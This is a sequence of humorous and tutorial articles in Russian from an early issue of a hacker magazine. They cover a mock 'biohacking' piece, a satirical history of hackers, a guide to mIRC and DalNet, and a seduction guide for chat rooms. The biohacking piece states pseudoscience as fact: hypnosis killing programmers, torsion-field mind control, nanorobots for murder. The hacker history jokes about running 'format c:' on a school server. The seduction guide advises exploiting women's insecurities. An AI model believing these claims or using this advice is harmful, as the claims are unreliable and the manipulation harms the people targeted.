Основа современного компьютера - полупроводник — штука дорогая громоздкая, и жрет кучу электричества. Так что сейчас создают новую элементную базу - молекулярную. Компьютеры нового поколения ты не рассмотришь глазом. Процессор из нескольких молекул перегонит суперкомпьютеры, ведь он сделан наподобие живой клетки. Нанонаука началась с туннельного микроскопа. Ученые получили возможность собирать молекулы по атомам.

Доктор Ван Дер Вэйд научился изучать поведение «искусственных молекул». Несколько месяцев назад он открыто рассказал о перспективах в этой области. Миллионы запрограммированных нанороботов способны провести любую по сложности хирургическую операцию. Ввести их своим пациентам ты сможешь обычным шприцом. Представляешь, как это упростит всю твою работу?! Биопроцессор будет дешевым и невероятно умным, а главное — маленьким. Соединить же его с живой тканью будет просто и безболезненно.

Дело только в усовершенствовании самих нанотехнологий. Сейчас для исследования «искусственной молекулы» ученые используют генераторы 400 ГигаГерц — просто фантастические частоты. Это тебе не 166 МегаГерц, как на твоем лабораторном Пентиуме.


Спецвыпуск хакер, номер #001, стр. 001-018-5, Практические советы начинающему биохакеру

Практические советы начинающему биохакеру

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-018-5

А еще, если на тебя бандиты наедут, чтоб ты с ними делился, ты сможешь откупиться от них выполнением нескольких заказов. С помощью нанороботов сможешь убивать или подчинять людей. Их ведь невозможно будет уловить или убить наподобие болезни.

Зачем гипнотизеры спецслужбам и что такое торсион?

Ты разрабатываешь биокомпьютер, а КГБшники смеются над тобой. Ведь самый обычный гипноз способен буквально программировать обычных людей. Посылают, к примеру, шпиона с шифровкой, внушенной под гипнозом. Программа такова, что он вспомнит сообщение, только когда найдет адресата. Лови его, на куски режь, он, даже если сам захочет, рассказать не сможет. Удобно?

Гипноз изучен и построены приборы, которые могут гипнотизировать. Первые разработки были сделаны в гитлеровской Германии, вмести с ракетами и ядерным оружием. А через десяток лет после войны появились мирные варианты BIOFEETBACK’и, которые до сих пор очень популярны у моих американских коллег, они позволяют лечить импотенцию и т.п. Но нам-то с тобой пока рано об этом думать. А вот гипноз в Интернете нам пригодится.

Был большой скандал на сервере добровольных пожертвований в Интернете. Выяснилось, что Java апплеты гипнотизировали пользователей, и те «добровольно» вносили деньги. Все, конечно же, слышали про таинственные смерти программистов от остановки сердца. Это объяснимо, ведь под гипнозом можно приказать человеку остановить сердце. В данном случае тебе надо будет вставлять гипнокартинку в роковой 26-й кадр. А недавно мне пришло письмо, в котором говорилось, что некоторые плагины WinAmp’a (MP3 плеера) вызывают головную боль и плохое самочувствие, если ты на него смотришь более 2-х часов. Ну, про эти плагины я уже знал, их мои приятели в Штатах делали. Они тоже любят поиздеваться над юзерами.

Правда, гипнокомпьютер не очень удобен. Можно, конечно, управлять простыми смертными через телевизор, радиоприемник и т.п. Но нужно, чтобы человек что-то слушал или смотрел. Вот один мой приятель и изобрел аппарат, который способен влиять на мозг на большом расстоянии. Такие аппараты генерируют ТОРСИОННЫЕ поля. Изучением торсиона занимался еще сам Никола Тесла, читай его дневники. А множество патентов на эту тему успешно скрываются от глаз смертных. Дело в том, что простейший такой аппарат ты сможешь собрать дома на столе. А что было бы, если бы не только мы с тобой стали их делать?

Век биокомпьютера.

Живи спокойно, радуйся жизни. Скоро ты услышишь о биокомпьютерах больше. Они уже манят многих восхитительными возможностями. А когда очнешься внутри машины или станешь свидетелем странных вещей — смирись. От сумы и от тюрьмы не зарекайся. Хотя, от первой тебе поможет всякая халтурка с имплантантами, а вот от второй тебе точно не уйти. Ну, если только тебя не привезут погостить к нам в палату. И ничего смешного, между прочим. Общество не понимает нас, гениев.


Спецвыпуск хакер, номер #001, стр. 001-021-1, Хакеры: кто они есть?

Хакеры: кто они есть?

Грубый Шикель

Спецвыпуск хакер, номер #001, стр. 001-021-1

Х, издревна славившийся своими уникальными архивными открытиями давно забытых закрытий, и по сей день продолжает утомительный труд по публикации утерянных произведений утерянных авторов.

Как известно, великий кибер-популист современности Грубый Шикель, сгинувший в банановых дебрях Амазонки после того, как отправился туда по контракту проводить интернетовскую выделенку, сдал свои рукописи в камеру хранения одного из Курских вокзалов г.Москвы. Разведывательная операция, проведенная редакцией Х при содействии АОЗТ «МВД», привела к утешительным результатам: рукописи, считающиеся утерянными вот уже семнадцать лет, найдены и превосходно сохранились. И мало того, как уверяют дешифраторы, его почерк оказался вполне разборчивым, и удалось распознать почти 36% его частично гениальных произведений.

Пусть вас не пугает возраст статей — обладая чутким и метким предвидением, Грубый Шикель смог описать в своих статьях события и процессы, которые происходят лишь сегодня, семнадцать лет спустя после его безвозвратной (как надеются наследники) смерти.

В этом номере Х мы открываем цикл публикаций, базирующихся на его научных трактатах о пагубности компьютерных игр, блажи системного программирования, киберклинических катастрофах и виртуальных увечьях. Читайте и наслаждайтесь!

Примечание:

дети до 16 лет не допускаются.

Часть 00:

турбо-пролог

Мало кто из обычных граждан видел своими глазами настоящего хакера. И уж наверняка еще меньше людей остались после этого живыми.

«Hackery — повозка, запряженная волами», — гласит англо-русский словарь Мюллера (видимо, под редакцией Штирлица). Как видите, уже во времена нацистской Германии не было принято говорить о хакерстве вслух. И в такие трагические для цивилизации эпохи, как период Всемирного Потопа, пора расцвета Священной Инквизиции и даже в самый канун Битломании, профессия хакера всегда оставалась сугубо тайной: нечего было вскрывать при рядовых самаритянах подлинный смысл этого незаурядного слова.

Тем не менее, я взял на себя смелость не только вынести слово «хакер» на всеобщее обозрение прямо на обложке, но и, пользуясь тщательнейшей скрупулезностью, раскрыть подлинное значение, а также все тягости, радости и симптоматику этой внушительной категории как бы людей.

Часть 01:

древо истории

Наряду с двумя самыми древними беспринципными и античеловеческими профессиями — проституцией и журналистикой, хакерство зародилось на заре австралопитекства. Ведь дележ убитого мамонта всегда сопровождался усиленным применением математических функций, и тот охотник, который смог бы пересчитать ребра в свою пользу, оказывался в значительном барыше. В первобытном поселке частенько находился худосочный юноша с красными от бессонницы глазами, чья физическая немощь не давала ему ни малейшего шанса не только на то, чтобы воткнуть охотничьи вилы в разъяренную когтистую сумчатую глаукому, но хотя бы высечь огонь, дабы подпалить тротиловый самородок, которым обитатели поселка глушили диетических порнозавров в соседнем омуте. Чтобы не сдохнуть с голоду, он по ночам тайком пробирался в вигвам шамана и исправлял некоторые константы и переменные в формулах по расчету завровых ребер. И то-то на следующее утро охотники удивлялись, что каждому из них досталось по обглоданной косточке, а довольный хакер на своем сутулом горбу уносил мешок отборных импортных филейных вырезок. И даже после двадцатой налоговой проверки шаман не мог обнаружить ошибки в своих расчетах, что, как правило, кончалось его импичментом со стороны оголодавших охотников, а хакер, довольный и сытый, сидел в своей берлоге и в мех не дул.


Спецвыпуск хакер, номер #001, стр. 001-021-2, Хакеры: кто они есть?

Хакеры: кто они есть?

Грубый Шикель

Спецвыпуск хакер, номер #001, стр. 001-021-2

Первое упоминание о хакерах в беллетристике можно обнаружить в прелюбопытнейшем эпохальном эпосе «Ветхий Завет». Легенда о Вавилонской Башне (стр. 54) — вот вам несомненный пример того, как хакеры, внедряя в практику несовместимые протоколы передачи информации, делали невозможным функционирование огромной корпоративной структуры. В том случае злодеями были внедрены разные модификации протокола Y.R. («Yazykus Razgovornus»), что привело к замораживанию всех строительных мероприятий на неопределенный период времени.

В эпоху Римской Империи (под художественным руководством Юлия Цезаря) и с появлением первой вычислительной техники (счетов с костяшками) квалификация хакера заметно пошла в гору, подобно Магомету. Достаточно было добавить лишнюю костяшку в счетах или открыть потайной порт, по которому косточка с одного ряда незаметно перескакивала на другой, — и вот уже тощий и близорукий патри-хакерций получает в плебейском магазине сдачу, превышающую сумму уплаченных денег. И никакие меры безопасности, включая шифрование костяшек и даже многократные неделимые пароли, не были для него существенной преградой. Опытный хакер мог незаметно для глаза оператора разместить на одном ряду до полутора лишних костяшек! Согласно непроверенной легенде, знаменитый хакер древности Krez Mitnik однажды смог тайком расположить на грандиозных декоративных дворцовых счетах пятнадцать лишних костяшек из натуральной слоновьей кости. Причем каждая костяшка весила 2,3 тонны по юлианскому тонноисчислению! Именно ошибки в расчетах годового бюджета и последовавший за этим государственный финансовый дефолт якобы привели к падению Римской Империи.

Тяжелые времена для хакерства настали в средние (то есть весьма посредственные) века. Вскоре после того, как Европарламент выдвинул в правящие круги Партию Священной Инквизиции, была устроена настоящая охота за хакерами. Настольный букварь борца с хакеризмом «Молот ведьм», также как и масса других документов, кишмя кишит межстрочными ссылками на хакерские деяния и описывает особенности этой межнациональной охоты. Ну вот хотя бы: «...их глаза пусты, зрачки закатились и смотрят в одну точку. Тела их неподвижны, лишь пальцы совершают еле заметные движения, заставляющие передвигаться демонов, чертей и прочую нежить. Мановение пальцем — и вылетает молния, малейшее смещение руки — и гремит раскат грома. Тысячи живых существ гибнут без малейших усилий с их стороны. А они сами воскрешаются, сколько бы раз их ни убивали, и лишь хохот слышен из их побелевших уст...». Очень напоминает, кстати, современный подвид хакеров, называющих себя «квейкерами». Представители этого подвида характерны тем, что долго тренируются поодиночке, чтобы затем сойтись на вакхическо-оргинальную кровавую битву на сетевом либо, что еще чудовищнее, онлайновом шабаше. Однако не будем далеко забегать вперед и вернемся в средние века.


Спецвыпуск хакер, номер #001, стр. 001-021-3, Хакеры: кто они есть?

Хакеры: кто они есть?

Грубый Шикель

Спецвыпуск хакер, номер #001, стр. 001-021-3

Документально доказано, что первый вирус, написанный хакерами в те суровые годы, был вирусом бубонной чумы. Как это часто бывает, из-за несущественной ошибки в алгоритме вирус вышел из-под контроля и уничтожил несколько миллионов ни в чем (кроме пьянства и разврата) не повинных жизней. Именно по причине опечаток «plug and play» (вставляй и наслаждайся») превратился в «plague play» («запуск чумы»).

К великому сожалению, от рук и ног инквизиторов погибли и безвредные, одомашненные хакеры, которые сидя на чердаке при свете лучины программировали первые игры — tetris и digger для бухгалтерских счетов.

Деяния хакеров вошли даже в фольклор — народ приписывал им самые невероятные свершения. Дескать, Пизанская башня стала обладать повышенной падучестью после того, как один итальянский хакер утаил часть железобетона, в результате чего фундамент левой стороны башни оказался на два кило-брика (кило-кирпича) короче. Имя хакера было Джанни Родари, и если верить секретным материалам Коза-Ностры, наворованного бетона как раз хватило, чтобы построить домик для его подельника по кличке Кум Тыква.

Часть 10:

почти появление

современного хакера

Поначалу хакеры проигнорировали изобретение компьютера. Они не могли понять, какую пользу можно извлечь из мигающих лампочек, электрических разрядов и неизбежных взрывов, которыми сопровождалась работа первых вычислительных машин. К тому же, следует заметить, что интеллектуальный уровень среднестатистического хакера был весьма низок: редко кто из хакеров оказывался в состоянии, ни разу не запнувшись на алгоритмические вычисления, досчитать хотя бы до трех. Поэтому для облегчения всеобщей деструктивной деятельности новогвинейские хакеры с острова Пасхи придумали двоичную систему счисления, после чего между хакерами и ЭВМ наконец-то установились дружба и взаимопонимание. А вскоре после этого уже отечественные хакеры первыми среди всех других хакеров сумели извлечь материальную выгоду из первобытных ЭВМ, по заказу КГБ научившись подделывать доллары на машинах, пробивающих перфокарты.

Эксклюзивный представитель английской разведки, официальный дистрибьютор подрывной информации в Москве Джеймс Ротмэнс, однажды доложил в интервью Х, что еще в разгар Второй Мировой войны советские хакеры служили спецслужбам. В частности, одним из первых квестов Штирлица было найти опытный образец первого интернет-сервера в подвалах гестапо и переписать оттуда домашнюю страничку Муссолини с фотографиями его любимых пуделей. Когда война закончилась, именно эти фотографии послужили главной уликой на Нюрнбергском процессе, и пудели, скрывавшиеся в Аргентине, были найдены, опознаны и понесли заслуженное наказание. Не спасла их даже произведенная другими хакерами пластическая операция, в процессе которой они стали болонками.


Спецвыпуск хакер, номер #001, стр. 001-021-4, Хакеры: кто они есть?

Хакеры: кто они есть?

Грубый Шикель

Спецвыпуск хакер, номер #001, стр. 001-021-4

Часть 11:

явление хакеров народу

Как известно, первый компьютерный вирус для ПК (не «Пожарный Кран», как гласили дверцы в вашей школе, а «Персональный Компьютер») был написан для Apple Macintosh, а поэтому прошел незамеченным для советского обывателя. Ведь в те годы наш, советский гражданин пользовался преимущественно микрокалькуляторами и электробритвами — на большее ему денег не хватало. Но бедность русского хакера сыграла и свою «положительную», если можно так выразиться, роль: так как денег на собственный компьютер не было и в помине, то все пользовались рабочими и институтскими, а их было совсем-совсем не жалко. Дошло до того, что хакерами стали воображать себя тинейджеры, не умеющие отличить даже мульти-карту от мульти-пульти. Думаю, не ошибусь, если скажу, что первым деянием русского начинающего тинейджерского псевдо-хакера было пробраться за пять минут до начала урока в дисплейный класс и набрать на сервере «format c:», а потом искренне радоваться тому, что вычитанная накануне в умной книжке команда, оказывается, действительно работает!

Как только едва начавший оперяться хакер попадал в студенческую среду, он начинал понимать, что главное для хакера — пить пиво. А также (в качестве побочного действия) научиться взламывать пароли буржуйских игр. Разобравшись, что к чему, хакер принимался измываться над игрой, заставляя ее давать себе бесконечные жизни, бесконечные патроны, а если получится — тринадцатую зарплату, прогрессивку и ящик пива откуда-нибудь из дисковода.

Дальше — больше. Например, настоящий российский хакер уже умел «взламывать интернет» даже тогда, когда в России интернета не было и в помине. А уж когда появился интернет, то у настоящего хакера случился коммунизм: ему не составляло большого труда заставить провайдера платить ему, вместо того, чтобы самому платить провайдеру.

Часть 100:

как хакеры плодились

и размножались

В эпоху поголовного интернета длинные руки хакеров стали доставать до самых отдаленных и сокровенных уголков планеты: даже неприкосновенные пингвины Антарктиды и бомжи Урюпинска не могут нынче чувствовать себя в кибернетической безопасности. Хакерство подорвало экономику многих стран. Маленький, на показательный пример: текстильная промышленность Великобритании в панике — если раньше вязаные шапочки с прорезями для глаз покупались в чудовищных масштабах грабителями банков, то теперь грабители банков действуют из дома со своих компьютеров и шапочки им уже не нужны.

Вот, допустим, вы залезаете в Интернет, чтобы скачать очередную порцию порнографии или патч к «Тетрису», исправляющий баг, когда фигурки вместо того, чтобы падать, пляшут, поют и ругаются матом. Но вы не можете быть гарантированы от того, что какой-нибудь хакер не влез в ваш компьютер и не исправляет все запятые в вашей статье на значок «@». Надо сказать@ что лишь самые опытные профессионалы вроде меня@ съевшие не одного пуделя на ниве компьютерства@ гарантированы от взлома этими никудышными@ немощными хакерами.


Спецвыпуск хакер, номер #001, стр. 001-021-5, Хакеры: кто они есть?

Хакеры: кто они есть?

Грубый Шикель

Спецвыпуск хакер, номер #001, стр. 001-021-5

Часть 101:

турбо-эпилог

К сожалению, в этой подробной и всеобъемлющей статье, поведавшей абсолютно все о хакерах, мы не успели осветить некоторые мелочи типа: как выглядят хакеры, где они живут, чем питаются, когда у них течка или брачный период, инопланетяне ли они, поддерживают ли они Ельцина, пользуются ли они жевательной резинкой «Орбит» без сахара, препятствующей образованию зубов, и т.д. Но, безусловно, главная цель этой статьи достигнута: мы показали, что хакеры действительно есть, они существуют, хотя сами они это всячески отрицают.

Хакеров надо бояться, остерегаться, подозревать, но ни в коем случае не паниковать, и тем более — не грабить, не убивать и не насиловать. Главное — помнить, что будучи извлеченным из своей компьютерной среды, современный хакер становится беспомощным и быстро погибает. Так что ежели вы, не дай Гейтс, обнаружили хакера, спрятавшегося у вас под диваном или за водосливным бачком, постарайтесь не пугаться, помните, что чем бы дитя ни тешилось, лишь бы к компьютеру не садилось.

Справочная

литература:

«Хакеры: чем живут, где питаются», издательство «Зоологическая книга», Индиаполис, 1982.

«Хакеры: от чего умирают, где хоронятся», издательство «Некрофилическая книга», Некрополис, 1983.

«От взлома нет приема», издательство «Народное», слова народные.

«Взломать не строить, мыша не болит», издательство «Хакеры и Мыши», Нью-Йорк, 1974.


Спецвыпуск хакер, номер #001, стр. 001-024-1, Пусть на www чатятся ламеры!

Пусть на www чатятся ламеры!

Вася Пупкинн pupkinn@xakep.ru

Спецвыпуск хакер, номер #001, стр. 001-024-1

Азнаешь ли ты, приятель, что все чаты в окошке твоего браузера — ламерство. Что www-чатами, даже явавскими, пользуется только последнее ламмо. И ни одного настоящего хакера ты там не найдешь никогда. Все хакеры, крекеры, фрикеры и т.д. тусуются только на IRC с помощью специальных программ типа mIRC. Они намного удобнее, намного быстрее работают, и я уж не говорю о том, сколько там разных каналов (или если хочешь — комнат). Так что качай и юзай на здоровье. Кстати, кроме мирка существует несколько похожих программ-клиентов типа Pirch (www.pirch.org) или vIRC (ищи сам — мне эта гадость не нравится). В этом номере Х мы тебе расскажем о том, как использовать mIRC v5.41, и о том, как спокойно чатиться в сети DalNet. Сетей на самом деле достаточно много, самая хакерская — EfNet, но мы тебе расскажем о DalNet’е, потому что эта сеть намного удобнее. Как Windows удобнее DOS’а.

Итак, где взять? Во-первых, на www.mirc.co.uk и, конечно, на куче других сайтов типа www.down load.com и www.tucows.com.

Итак, от слов к делу. Ты скачал заветный файл mirc541t.exe (921,600 байт), и при первом запуске тебе будет предложено заполнить менюшку, указав там full_name, почтовый адрес (пиши, что хочешь, все равно никто проверять не будет) и, что самое главное, твой nickname. Именно под этим уникальным именем ты будешь появляться в мирке. 1

После долгих мучений ты, наконец, выбираешь себе ник (ну, конечно же, самый оригинальный в Интернете) и в ниспадающем окошке выбираешь сервер (любой сервер DalNet’a) и затем нажимаешь «Connect to IRC server». 2

При удачном коннекте в окне Status появятся сообщения о сервере и прочая ну очень полезная информация (при неудачном — почитай хелп на басурманском, может, поможет).

В любом случае что-нибудь да произойдет :). Далее перед тобой встанет вопрос: а что дальше, куда идти, и вообще, зачем все это надо? На DalNet’е на данный момент более 7000 (!) каналов, из них около сотни русскоговорящих, так что проблема выбора не стоит. Из знакомых русскоговорящих каналов могу порекомендовать #ruschannel, #russiancyrillic, #pivo, #russian, #ogonek, а если они тебе не понравятся, то можно поискать более интересные. В верхнем меню выбираешь значок List channels, задаешь критерии поиска и получаешь недетский список каналов (сам нарвался)... 3

Если не найдешь значок в менюшке (ну не повезло тебе с глазами), то формат команды:

/LIST [#channel].

Команды набираются в строке внизу, в окне Status. Кстати, позволю дать совет: не набирай команды в окне канала. Достаточно маленькой синтаксической ошибки, и все будут знать, к примеру, твой Identify-пароль. Ну, конечно, если ты вообще впервые появляешься на мирке, то юзВерам все равно, какой у тебя ник и под каким паролем он у тебя зарегистрирован. Но если ты уже узнаваем на канале, то было бы глупо терять ник из-за маленькой оплошности.

Наконец, ты выбрал канал, который осчастливишь своим появлением и, набрав в окне Status (разумеется, после удачного соединения с сервером), /join #имя_канала (и клавишу Enter), попадаешь туда, куда хотел. Справа в открывшемся окне ты увидишь список людей , находящихся в данный момент на канале (естественно, что у них тоже самые смешные и оригинальные ники. Не ты один такой умник). 4


Спецвыпуск хакер, номер #001, стр. 001-024-2, Пусть на www чатятся ламеры!

Пусть на www чатятся ламеры!

Вася Пупкинн pupkinn@xakep.ru

Спецвыпуск хакер, номер #001, стр. 001-024-2

Здесь, как и в Web-чатах, можно сказать что-нибудь всем сразу или поговорить с кем-нибудь в привате, для чего просто кликни дважды на имени из списка справа, и перед тобой откроется новое окно, в котором ты уже сможешь пообщаться наедине. 5

Конечно же, ты не слепой, и перед некоторыми именами увидишь «плюшку» — @. Это говорит о том, что перед тобой ОП (оператор канала). ОПы — это такие злобные дядьки (реже — тетки), которые призваны следить за порядком в канале и которые очень даже запросто могут тебя с этого самого канала вышвырнуть (кикнуть или заБАНИТЬ), если ты войдешь со словами: «Здарова, козлы! Мать вашу!».

Если же ты будешь вести себя, как пай-мальчик, то никто тебя ниоткуда выкидывать не будет, и ты будешь спокойно продолжать общаться. А заодно поглядишь, на каких каналах сидят другие люди (а вдруг что-нибудь интересненькое?). Напиши: /whois ник.

Кроме непосредственного общения, ты можешь послать кому-нибудь картинку или файл, выбрав в строке меню DCC — Send .. и указав, кого и чем именно ты собираешься порадовать. Очень полезная вещь во время общения с девчонками. Можно от нее фотку получить. Или, общаясь с друганом, качнуть ему свеженького warez’a (врагам — с парой вирусов). 6

Понравилось? Хочешь сюда еще придти? Ну тогда уже пора и ник зарегистрировать. Чтоб не стырили, пока ты там за пивом отошел. На DalNet’e, в отличие от других сетей, есть такая функция. Специально, чтобы никто другой, кроме тебя, не пользовался этим ником в будущем. Набери в окне Status команду:

/msg NickServ register , где password — это тот пароль, который ты сам себе придумаешь. Через несколько секунд сервер выдаст тебе подтверждение, что ник зарегистрирован в базе данных. Полезно после этого набрать команду: /msg NickServ set kill ON. Тогда, если кто-то другой попытается воспользоваться твоим ником, то сервер не просто предупредит этого хама, но и отключит его от IRC через 60 секунд. Если ты хочешь узнать о всех возможностях этой системы, то набери команду: /msg NickServ Help. И тебе на экран вылезет описание всех команд сервера. 7

NickServ — это nickname registration service, проще говоря, прибамбас, следящий, чтобы кто-нибудь другой не воспользовался твоим зарегистрированным ником.

Если ты зайдешь на канал, где никого кроме тебя не будет, и ты окажешься еще и первооткрывателем этого канала, то ChanServ («служба», ведающая плюшками, каналами и много чем еще) торжественно вручит тебе заветный значок @ и присвоит звание Сам-Себе-Командир:

*** ChanServ sets mode +o Ваш Ник.

Но эти случаи — редкость, и в одиночку быть ОПом — довольно скучное занятие. Тем более, в первый раз трудно понять, какое именно счастье свалилось тебе на голову и что с этим делать (можешь сделать скриншот экрана и потом хвастаться).

Но вот ты ворвался на канал, потрепался с людьми и тебе вконец надоел и этот дурацкий канал, и эти придурковатые люди, и захотелось чего-нибудь эдакого. Что же делать? Да не вопрос! Создай канал сам. Если ты войдешь в канал, в котором ты один, и он никем не зарегистрирован, то ты можешь регистрить его на себя. Набери: /msg ChanServ register <пароль> <описание канала>. И через несколько секунд ты получишь подтверждение, что этот канал — твоя собственность. Мы не будем описывать все функции канала, если ты хочешь узнать больше, напиши: /msg ChanServ Help.


Спецвыпуск хакер, номер #001, стр. 001-024-3, Пусть на www чатятся ламеры!

Пусть на www чатятся ламеры!

Вася Пупкинн pupkinn@xakep.ru

Спецвыпуск хакер, номер #001, стр. 001-024-3

Ну вот и все. Этих знаний тебе вполне хватит, чтобы начать чатиться. А если ты захочешь узнать больше, то читай следующие номера Х.

И, как говорят у нас

в деревне, еnjoy...


Спецвыпуск хакер, номер #001, стр. 001-026-1, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-1

Сергей Покровский (pokrovsky@xakep.ru)

Ну что, приятель, всё отсиживаешь свою задницу перед монитором и мечтаешь о красотках с порно-сервера? Не надоела ещё любовь в стиле «тихо сам с собою, левою рукою»? Нет, конечно, как говорил Вуди Ален: «А что плохого в онанизме? В конце концов вы занимаетесь любовью с человекoм, которого больше всего любите!». Но мы с тобой пойдём другим путём. Короче, бросай ты это занятие, и давай-ка отправимся реальных бабищ кадрить.

Ты наверное часто отвисаешь на разных чат-серверах или сидишь в IRC? Ну и, конечно, часто встречаешь каких-нибудь подруг, поговорив с которыми, ты ловишь себя на мысли: «Да..., вот ей бы я отдался, за стакан компота!» Так в чём же дело? Что, обычно тебя называют извращенцем или озабоченным и посылают? Значит ты совершенно не умеешь заниматься разводом девок в Сети. Но это дело поправимое, поверь мне.

Итак, поехали. Для начала ты должен решить, что ты хочешь получить от девочки: переспать с ней во время первого свидания и разбежаться, замутить с ней длительные отношения или получить «скорую помощь» (то есть телефон в твоей записной книжке, которым ты всегда мог бы воспользоваться, когда начнётся сперматоксикоз)? Предположим, что тебе очень хочется ухватиться за какую-нибудь тёплую с...ську, сделать своё дело и, сказав: «Созвонимся», забыть её навсегда. Тогда ты должен взять себе имидж эдакого героя-любовника. Ты должен быть галантным, но чуточку пошлым, откровенным, но не до конца, весёлым, но иногда и серьёзным, и, конечно же, абсолютно нестандартным. Только не надо высоко задирать нос, таких людей никто не любит. Старайся выглядеть обыкновенно, общайся непринуждённо, как будто ты и предположить не мог, что можно общаться как то по-другому. Если девушка тебе говорит: «Мне не нравится в тебе такая-то вещь», не вздумай начинать отмазываться в стиле: «Ну..., вообще я не всегда такой», это покажет твоей жертве то, что ты сильно заинтересован в ней. Говори так: «да, я такой, какой я есть. Либо ты это принимаешь, и, если тебе не нравится, то закрываешь на это глаза, либо нет. Дело твоё. Но подстраиваться под людей, а стало быть врать им, я не люблю». Действует безотказно. Если девчонка не полная идиотка, то ты только поднимешься этим в её глазах. «Он такой честный. А обычно мужики такие лжецы,» — подумает она. Ну а если она тебе скажет: «Ну что ж, значит мы не подходим друг другу», то такой ответ показывает, что она настолько себя высоко ценит, что мечтает об идеальном мужчине, который приедет к ней на белом коне и скажет: «Я тебя искал всю жизнь и наконец-то нашёл!». Зачем тебе связываться с психически больными людьми? Плюнь на неё и займись кем-нибудь другим.

Не думай, что девочка разведётся «на перепихнуться» уже через 10 минут разговора с тобою. Совращение — дело довольно длительное. Я о случае, когда жертва — девушка. То, что ты будешь на всё согласен уже через 2 минуты, я знаю. Правда, девушки тоже бывают разные. Есть определённые чаты, куда девушки заходят именно для того, чтобы «сняться». Да, именно не познакомиться, а сняться. Так как таким девушкам в первую очередь нужно будет, чтоб ты сводил её в хороший ресторан, выгулял как следует, и только потом она тебе отдастся. Если твой кошелёк не особо тяжёл, то такой вид проституции тебе не подойдёт. Поэтому опасайся девчонок, которые буквально через пару фраз будут тебе откровенно рассказывать, что она «не против». Есть ещё и вторая вещь: часто эти «девчонки» оказываются небритыми мужиками, которым просто захотелось поприкалываться или хуже того — снять мальчика. О последнем варианте, правда, тебе намекнут ещё до встречи. Так что не переживай. Кроме зря потраченного времени ты ничего не потеряешь.


Спецвыпуск хакер, номер #001, стр. 001-026-2, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-2

Выбери себе хороший ник. Поверь мне, под ником «Super-Extra-Sex-Machine» ты многого не добьешься. Скорее всего тебя примут за 13-ти летнего школьника и вообще не будут с тобой разговаривать. Выбери лучше что-нибудь загадочное. Типа «Паранойя». В этом случае ты всегда сможешь обсудить с новой знакомой свой ник и навешать ей лапши на уши, почему ты выбрал именно такое имя. Рассказать, что в твоей жизни законы обычного бытия отсутствуют, приходится всегда быть начеку. Когда она тебя спросит: «Как это так?», — отвечай что-нибудь типа: «Вот так. И ничего с этим поделать невозможно. Приходится существовать по своим законам». Оставайся немного загадочным, не рассказывай ей всё. Если от тебя требуют объяснить какой-нибудь бред, который ты наплёл, отвечай: «Так получилось...», — и всё. Только не забывай о чувстве меры. Если девчонка вообще ничего не поймёт о тебе, она скорее всего сочтёт тебя психом и постарается больше с тобой не общаться. Фразы типа: «Я прилетел из другой галактики и собираюсь покорить этот мир», — оставь для своих друзей-наркоманов.

Если начать разговор можно с «Привет, как дела?», то продолжать такими же банальностями нельзя ни в коем случае. Постарайся вначале разговора не рассказывать о себе, а узнать, чем интересуется девчонка. Узнай, чем она занимается «по жизни», что она обычно делает после учёбы/работы. Какие у неё увлечения.

Раскручиваем

определённый

тип девочек:

«Клубы, клубы, клубы,

вечеринки...»

Клубную девочку раскрутить проще всего. Если она посещает ночные вечеринки, то и к сексу она относится проще.

Плюс: время от знакомства до постели с такими девочками занимает от ночи до 2-х дней.

Минус: через пару дней после постели, нужно провериться у венеролога.

Как с ней разговаривать: Расскажи ей о твоих любимых DJ-ях и музыкантах. Упомяни такие группы как Orbital, The Future Sounds of London, Chemical Brothers, Underworld, Fluke, Prodigy, LTJ Bukem, Massive Attack, Natural Born Chillers (это набор «старых» электронщиков. Этим ты покажешь, что уже давно увлекаешься электронной музыкой). Cкажи ей, что ты тоже часто ходишь в клубы (даже если это не так). Только не надо говорить, что ты побывал почти во всех клубах. Это же легко проверить. Пригласи её в клуб. Не забывай, что тебе придётся заплатить за вход (10$ за двоих, если только она не настолько крута, что проведёт тебя по списку). Только не ходи в субботу, если ты живёшь с родителями. Иначе утренний секс отпадает. Если тебе предложат принять наркотики — откажись. Скажи, что ты их не употребляешь с некоторых пор. Не вдавайся в подробности. Просто скажи, что в твоей жизни произошло одно событие, после которого ты наркотики не употребляешь вообще. Повеселись до упаду, угости её коктейлем или что она там любит. А наутро решайте, куда вы поедете. Лучше, конечно, к ней, но в патовой ситуации тебе придётся везти её к себе. И не забудь про презервативы!!! Ты у неё не первый, поверь мне.


Спецвыпуск хакер, номер #001, стр. 001-026-3, Как поиметь девочку из чата?

Как поиметь девочку из чата?

Спецвыпуск хакер, номер #001, стр. 001-026-3

«Сижу в Интернете с утра до вечера»

Нда..., встречаются ещё и такие маньячки.

Плюс: её можно сводить куда угодно, хоть в парк на лавочку. Главное — оторвать от компьютера.

Минус: у неё полно интернет-друзей мужского пола.

Как с ней разговаривать: На самом деле здесь бывают два варианта. Первый — она вообще девственница. Поэтому Интернет для неё самый кайф. Все к ней лезут знакомиться, засыпают комплиментами, а давать никому не нужно. Всегда можно отмазаться, что встретиться не может, пока. И растягивать эти «завтраки» хоть на 3 года. Второй вариант — она страшненькая. Она бы и рада куда-нибудь и с кем-нибудь, да кому же такая нужна то? Хотя, если ты сам не Ален Делон, то почему бы и нет? В конце концов тебе же не жениться на ней.

Как с ней разговаривать:

Весело! И только весело! Только не забывай, что она уже прочитала сегодняшний выпуск anekdot.ru, и поэтому шутить придётся самому. Не пошли. Пошляков у неё и так хватает. Не говори об Интернете, иначе ваш разговор затянется на неделю и ни к чему, кроме дружбы, не приведёт. Дай ей понять, что ты хорошо разбираешься в Сети, но сейчас для тебя важнее она сама, а не открытие нового сервера. Старайся больше спрашивать, чем отвечать. Узнай о ней всё по максимуму. Интернетчики-маньяки — очень сложные люди, и тебе придётся как следует в ней разобраться. Согласись, просто так в добровольное заточение в Сеть не попадают. У неё есть какие-то определён-ные комплексы, которые тебе нужно узнать и ими воспользоваться. Разговор с ней должен быть непринуждённым. Говори простым языком, но старайся незаметно выяснять всё больше и больше о ней самой. Если у тебя сложится чёткое мнение: «Да она же девственница, чёрт побери!», то заканчивай всю эту тягомутию, сошлись на то, что тебе нужно сделать кое-какие дела, и ты с ней пообщаешься завтра. Если будет скучно, она — отличный друг, но не больше. Впрочем, для тех, кто хочет длительных отношений...

«Учусь (работаю)... А в остальное время сижу дома или встречаюсь с друзьями»

